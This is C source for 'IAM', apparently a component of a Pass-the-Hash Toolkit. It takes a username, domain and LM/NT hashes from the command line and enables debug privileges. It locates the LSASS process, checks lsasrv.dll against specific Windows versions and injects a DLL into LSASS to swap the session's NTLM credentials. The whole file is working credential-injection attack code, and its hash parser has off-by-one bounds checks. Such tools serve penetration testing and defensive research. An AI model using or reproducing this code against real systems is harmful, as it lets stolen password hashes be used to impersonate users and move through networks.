// $Id: iam.c,v 1.10 2008/01/21 15:30:11 hochoa Exp $

/*
 * iam.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#include "dllfuncs.h"
#include "findfuncs.h"

#define LSASRVDLL_WINXPSP2_FILEVERSION_MS		0x50001
#define LSASRVDLL_WINXPSP2_FILEVERSION_LS		0xA280BA0

#define LSASRVDLL_SERVER2003_FILEVERSION_MS		0x50002
#define LSASRVDLL_SERVER2003_FILEVERSION_LS		0xECE0000

#define LSASRVDLL_VISTA_FILEVERSION_MS			0x60000
#define LSASRVDLL_VISTA_FILEVERSION_LS			0x17704002

DWORD GetLogonID(void);
BOOL EnableDebugPrivs(void);
DWORD GetLSASSPid(void);
void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhashstr, char* out_nthashstr);


void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhash, char* out_nthash)
{
int sep_count;
char *tmp;
char username[1024], domain[1024], lmhashstr[32], nthashstr[32];
int n;

	if(cmdline == NULL || out_username == NULL || out_domain == NULL || out_lmhash == NULL || out_nthash == NULL) {
		printf("Error in cmdline!. Bye!.\n");
		exit(0);
	}

	sep_count = 0;
	tmp = cmdline;
//	printf("%p\n", tmp);

	// strchr is executed one more time that needed, but oh well
	while(  ((tmp=strchr( tmp, ':')) != NULL) ) {

//		printf("%p\n", tmp);	
		tmp++;
		sep_count++;
		if( sep_count > 3 ) {
			printf("Error in cmdline!. Credentials format is wrong! too many ':' characters!\n");
			exit(0);
		}


	}

	if( sep_count < 3 ) {
		printf("Error in cmdline!. Credentials format is wrong! too few ':' characters!\n");
		exit(0);
	}

//	printf("count: %d\n", sep_count);

	tmp = cmdline;
	n = 0;
	while( *tmp != ':') {
	
		username[n++] = *tmp++;
		if( n > sizeof(username)-2) {
			printf("username is too long!.\n");
			exit(0);
		}

	}

	if( n < 1 ) {
		printf("username wrong format!.\n");
		exit(0);
	}
	username[ sizeof(username)-1 ] = '\0';
	username[ n ] = '\0';
//	puts(username);
	// careful...
	strcpy( out_username, username);
	
	n = 0;
	tmp++;
	while( *tmp != ':') {
		domain[n++] = *tmp++;
		if( n > sizeof(domain)-2) {
			printf("domain is too long!.\n");
			exit(0);
		}
	}

	if( n < 1 ) {
		printf("domain wrong format!.\n");
		exit(0);
	}

	domain[ sizeof(domain)-1] = '\0';
	domain[ n ] = '\0';
//	puts(domain);
	// careful..
	strcpy( out_domain, domain);

	n = 0;
	tmp++;
	while( *tmp != ':') {
		lmhashstr[n++] = *tmp++;
		if( n > sizeof(lmhashstr)) {
			printf("lmhash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("lmhash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", lmhashstr[n]);
//	}
//	printf("\n");
	// Careful.. 
	memcpy( out_lmhash, lmhashstr, 32);

	n = 0;
	tmp++;
	while( *tmp != '\x00' || *tmp == ' ') {
		nthashstr[n++] = *tmp++;
		if( n > sizeof(nthashstr)) {
			printf("nthash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("nthash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", nthashstr[n]);
//	}
//	printf("\n");
	// Careful...
	memcpy( out_nthash, nthashstr, 32);

}




DWORD GetLSASSPid()
{
	
	DWORD ProcArray[100];
	DWORD nBytes;
	int nTotalProc;
	DWORD dwLSASSPID;
	int nProc;

	EnumProcesses(ProcArray, sizeof(ProcArray), &nBytes);
	nTotalProc = nBytes / sizeof(DWORD);

	for (nProc = 0; nProc < nTotalProc; nProc++)
	{
		CHAR szFileName[MAX_PATH];
		HMODULE ModArray[100];
		HANDLE hProc;

		hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
			FALSE, ProcArray[nProc]);
		EnumProcessModules(hProc, ModArray, sizeof(ModArray), &nBytes);
		GetModuleFileNameEx(hProc, ModArray[0], szFileName, sizeof(szFileName));
		CloseHandle(hProc);

		if (strstr(szFileName, "lsass.exe"))
		{
			dwLSASSPID = ProcArray[nProc];
		}
	}
	
	return dwLSASSPID;
}

BOOL EnableDebugPrivs()
{
	HANDLE hToken = 0;
	TOKEN_PRIVILEGES newPrivs;
	BOOL bStatus = FALSE;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
		&hToken))
	{
		goto clean;
    }

	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newPrivs.Privileges[0].Luid))
    {
		goto clean;
	}

	newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	newPrivs.PrivilegeCount = 1;
    
	if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs, 0, NULL, NULL))
	{
		goto clean;
	}

	bStatus = TRUE;

clean:
	if (hToken)
	{
		CloseHandle (hToken);
	}

	return bStatus;	
}

// Return: 0 = error
DWORD GetLogonID(void)
{
	TOKEN_STATISTICS TokenStats;
	HANDLE hToken;
	BOOL bStatus;
	DWORD nBytes;
	DWORD logonIDlow;
	DWORD logonIDhigh;


	logonIDlow = logonIDhigh = 0;
	bStatus = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
	if (bStatus)
	{
		bStatus = GetTokenInformation(hToken, TokenStatistics,
			&TokenStats, sizeof(TokenStats), &nBytes);
		if (bStatus)
		{
			logonIDlow = TokenStats.AuthenticationId.LowPart;
			logonIDhigh = TokenStats.AuthenticationId.HighPart;
			bStatus = TRUE;
		}
	}

	
	return logonIDlow;
}

void banner(void)
{

	printf("IAM v1.2 - by Hernan Ochoa (hochoa@coresecurity.com) - (c) 2007-2008 Core Security Technologies\n");

}

void help(void)
{
	printf("This tool changes the current session NTLM credentials.\n");
	printf("syntax:\n");
	printf("\t\tiam.exe username:domainname:LMhash:NThash <-B>\n\n");
	printf("-B\tis an optional parameter. If iam.exe crashes when run in your system, use this parameter. ");
	printf("IAM.EXE will try to locate some memory locations instead of using hard-coded values.\n");
	printf("Examples:\n");
	printf("\t\tiam.exe administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10\n");
	printf("\nor:\n\n");
	printf("\t\tiam.exe administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10 -B\n\n\n");

}



int main(int argc, char *argv[])
{
DWORD dwLogonID, dwLSASSPID;
BOOL bRet;
BYTE LMHash[16], NTHash[16];
char LMHashstring[32], NTHashstring[32];
DWORD dwHandle;
DWORD dwFileInfoSize;
PBYTE pbFileInfoData;
char windowsDirectory[MAX_PATH];
char lsasrvPath[2048];
VS_FIXEDFILEINFO *pFixedFileInfo;
unsigned int uFixedFileInfoSize;
char szUsername[1024], szDomainName[1024];
int f, j, i;
char tmp1[10];
BOOL bFindFuncs;
AddressesGroup currentAddrGroup;


	// Show banner
	banner();

	// Is IAMDLL.DLL in the same directory? if it is not,
	// throw an error an exit.
	if( access(".\\iamdll.dll") ) {
		printf("Error: iamdll.dll is not in the current directory!.\n");
		exit(0);
	}
	// do not find functions by default
	bFindFuncs = FALSE;

	// Do we have the required parameters?
	// 2 parameters are required, the second is not (-B).
	if( argc < 2 ) {
		help();
		return 0;
	}

	// is the sixth parameter ok?
	if( (argc == 3) && (!strcmp(argv[2], "-B")) ) {
		bFindFuncs = TRUE;
	}
	else if( argc == 3 ) {
		// invalid 6th. parameter
		printf("Invalid parameter: %s\n", argv[2]);
		help();
		return 0;
	}

	memset( szUsername, '\0', sizeof(szUsername) );
	memset( szDomainName, '\0', sizeof(szDomainName) );

	ParseCmdline( argv[1], szUsername, szDomainName, LMHashstring, NTHashstring );


	// convert ascii to hex
	for( f=0, j=0 ; f<32; f+=2, j++) {
              tmp1[0] = LMHashstring[f];
              tmp1[1] = LMHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              LMHash[j] = (unsigned char)i;

              tmp1[0] = NTHashstring[f];
              tmp1[1] = NTHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              NTHash[j] = (unsigned char)i;


	}
	
	printf("Parameters:\n");
	printf("Username: %s\n", szUsername);
        printf("Domainname: %s\n", szDomainName);
	printf("LM hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)LMHash[j]);
	}
	printf("\nNT hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)NTHash[j]);
	}
	printf("\n");


	if( GetSystemWindowsDirectory( windowsDirectory, sizeof(windowsDirectory)) == 0) {
			printf("Cannot Obtain Windows Directory!.\n");
			exit(0);
	}

	windowsDirectory[MAX_PATH-1] = '\0';
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';
	_snprintf(lsasrvPath,sizeof(lsasrvPath)-1,"%s\\system32\\lsasrv.dll", windowsDirectory);
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';

	printf("LSASRV.DLL Location: %s\n", lsasrvPath);

	dwFileInfoSize = GetFileVersionInfoSize(lsasrvPath,&dwHandle);
	if( dwFileInfoSize == 0 ) {
			printf("Cannot get LSASRV.DLL Version Size Info.\n");
			exit(0);
	}

	pbFileInfoData = NULL;
	pbFileInfoData = (PBYTE) malloc( dwFileInfoSize );
	if( pbFileInfoData == NULL ) {
		printf("Cannot allocate buffer to get LSASRV.DLL Info.\n");
		exit(0);
	}

	bRet = GetFileVersionInfo( lsasrvPath,
				dwHandle,
				dwFileInfoSize,
				pbFileInfoData );

	if( bRet == FALSE ) {
			printf("Cannot get LSASRV.DLL VersionInfo!.\n");
			if( pbFileInfoData != NULL ) free( pbFileInfoData );
			exit(0);
	}


	bRet = VerQueryValue( pbFileInfoData, "\\", &pFixedFileInfo, &uFixedFileInfoSize );
	if( bRet == FALSE || uFixedFileInfoSize == 0 ) {
		printf("Cannot obtain version info from info block!.\n");
		exit(0);
	}

	// display LSASRV.DLL version
	printf("LSASRV.DLL version: %.8Xh.%8Xh\n", pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS);

	// Let's check to see if it is ok to work with this DLL
	printf("Checking LSASRV.DLL....");
	if( bFindFuncs == FALSE ) {
		bRet = FALSE;
		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_WINXPSP2_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_WINXPSP2_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_SERVER2003_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_SERVER2003_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_VISTA_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_VISTA_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( bRet == FALSE ) {
			printf("Unknown LSASRV.DLL.\n");
			exit(0);
		}

		printf("OK!\n");
	}
	else {
		printf("skipped. (-B was specified).\n");
		printf("Trying to obtain addresses...");
		if( findFuncs( &currentAddrGroup ) == FALSE ) {
			printf("Failed! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
			exit(0);
		} else {

			if( currentAddrGroup.pAddCredential == VALUE_UNKNOWN ||
					currentAddrGroup.pEncryptMemory == VALUE_UNKNOWN ||
					currentAddrGroup.pFeedback == VALUE_UNKNOWN ||
					currentAddrGroup.pDESKey == VALUE_UNKNOWN ||
					currentAddrGroup.pLogonSessionList == VALUE_UNKNOWN ||
					currentAddrGroup.pLogonSessionListCount == VALUE_UNKNOWN ) {
				printf("Failed! (the address group was not correctly identified!. email the author!)\n");
				exit(0);
			}

			printf("Ok! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
		}


	}

	EnableDebugPrivs();
	dwLogonID = GetLogonID();
	dwLSASSPID = GetLSASSPid();
	printf("LOGONID: %.8xh\n", dwLogonID );
	printf("LSASS_PID: %.8xh\n", dwLSASSPID );

	bRet = InjectDll(dwLSASSPID, dwLogonID, 0, bFindFuncs, pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS, szUsername, szDomainName, LMHash, NTHash);

}

